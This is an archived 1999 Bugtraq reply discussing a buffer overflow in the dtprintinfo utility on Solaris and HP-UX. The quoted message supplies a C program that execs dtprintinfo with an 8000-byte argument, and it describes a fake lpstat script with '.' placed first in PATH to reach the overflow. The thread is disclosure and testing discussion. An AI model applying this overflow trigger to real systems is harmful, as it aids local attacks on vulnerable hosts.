Bugtraq mailing list archives
Re: [Solaris2.6,2.7 dtprintinfo exploits]
From: Thiago.M.M.Zaninotti () UNILEVER COM (Thiago MM Zaninotti)
Date: Fri, 14 May 1999 12:13:47 -0300
Hi Paul, I'm sorry for the wrong output I've provided and you are correct: csh will complain about long strings. I've already checked it in another shell and it didn't appear to be vulnerable to the problem. Thiago Zaninotti IMC LABG -----Original Message----- From: Paul Hart [SMTP:hart () iserver com] Sent: Thursday, May 13, 1999 8:15 PM To: Thiago MM Zaninotti Subject: Re: [Solaris2.6,2.7 dtprintinfo exploits] On Wed, 12 May 1999, Thiago MM Zaninotti wrote:
dtprintinfo in HPUX does not seen to be vulnerable to the overflow problem: % /usr/dt/bin/dtprintinfo -p `perl -e "print 'A' x 8000"` Pathname too long. %
That's a message from your shell, not the dtprintinfo program; the dtprintinfo program is never being run. Your shell thinks that 8000 characters in an argument is too long. You'll need to use a different shell that can handle long arguments (I use tcsh) or make a small C program that execs dtprintinfo with the long command argument. This should work: #include <unistd.h> #include <string.h> #include <stdio.h> #define LENGTH 8000 void main() { char buffer[LENGTH]; memset(buffer, 'A', LENGTH); buffer[LENGTH - 1] = '\0'; execl("/usr/dt/bin/dtprintinfo", "dtprintinfo", "-p", buffer, NULL); printf("exec failed"); } Also make sure (at least on Solaris) that you have a script in your current directory named "lpstat" and that "." is the first element of your PATH environment variable. Here's what I have for my lpstat script: #!/bin/sh echo "system for lpprn: localhost"
Current thread:
- Re: [Solaris2.6,2.7 dtprintinfo exploits] Thiago MM Zaninotti (May 12)
- <Possible follow-ups>
- Re: [Solaris2.6,2.7 dtprintinfo exploits] Thiago MM Zaninotti (May 14)